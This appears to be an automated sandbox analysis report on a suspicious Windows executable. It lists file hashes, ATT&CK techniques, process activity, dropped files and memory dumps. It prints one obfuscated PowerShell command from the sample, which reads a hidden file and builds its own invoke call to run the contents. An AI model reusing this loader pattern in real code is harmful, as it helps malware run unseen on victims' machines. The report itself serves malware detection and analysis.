a764b13001e6096c2ac36917bef4405ba8d22b6d06a5741f21977bf46c8afca4

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12-09-2024 10:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe
Size

707KB
MD5

23956e32be182666e0efceecd423376f
SHA1

2e00a592b4c2fa8b99b62eb9d0e886bfcc103dc2
SHA256

a764b13001e6096c2ac36917bef4405ba8d22b6d06a5741f21977bf46c8afca4
SHA512

abe088e593ea900b9ed622b7e1751b2d3f1287b6dc683b99ee76629f4a2c5fecf5a21065ac15e2d6b60ec15bef16f05c2eab31858d0a381f87318cdb3f19bb5b
SSDEEP

12288:jfYRGeCHL7BTAIMMMgNTl+kVpMfynA4fA3Nws9Cn6oUisns52wA3ImBlVknu6RtM:jfYIxMMMgNTcv6nAUuS6fbs2wA/leliz

Score

7^/10

discovery execution

Malware Config

Signatures

Loads dropped DLL 1 IoCs

pid	Process
2368	SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1684	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1684	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2368	SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1684	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 1684	2368	SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe	30
PID 2368 wrote to memory of 1684	2368	SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe	30
PID 2368 wrote to memory of 1684	2368	SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe	30
PID 2368 wrote to memory of 1684	2368	SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe	30

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle minimized "$Kuldsejlede=Get-Content 'C:\Users\Admin\AppData\Local\hjemmebagtes\Semitisk\Kompagnon.Boa';$Rheumily=$Kuldsejlede.SubString(52518,3);.$Rheumily($Kuldsejlede)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\quipping.ini

Filesize
31B

MD5
b65d9d0954c63abeaa2f3bbfbdb38083

SHA1
cb1463622481c3ac5cb5fe4244e3b793450f634b

SHA256
e4789c68b39b47d9b8790d5fabc77bc3e48bb018be4d5bffa3adc6825e2a0f2d

SHA512
df1c7f3117c3ee307e2de0c7bbe0e0d9ed451e1f726f24572b5b3f2c44051b98fe3a20c68c9b3ad4f0db146b276a836b2dceadfecfc176ad1f49fc113f1ebd22

Download Submit
\Users\Admin\AppData\Local\Temp\nsy8BFB.tmp\nsExec.dll

Filesize
7KB

MD5
11092c1d3fbb449a60695c44f9f3d183

SHA1
b89d614755f2e943df4d510d87a7fc1a3bcf5a33

SHA256
2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77

SHA512
c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a

Download Submit
memory/1684-151-0x0000000073551000-0x0000000073552000-memory.dmp

Filesize
4KB

Download
memory/1684-153-0x0000000073550000-0x0000000073AFB000-memory.dmp

Filesize
5.7MB

Download
memory/1684-152-0x0000000073550000-0x0000000073AFB000-memory.dmp

Filesize
5.7MB

Download
memory/1684-154-0x0000000073550000-0x0000000073AFB000-memory.dmp

Filesize
5.7MB

Download
memory/1684-155-0x0000000073550000-0x0000000073AFB000-memory.dmp

Filesize
5.7MB

Download
memory/1684-156-0x0000000073550000-0x0000000073AFB000-memory.dmp

Filesize
5.7MB

Download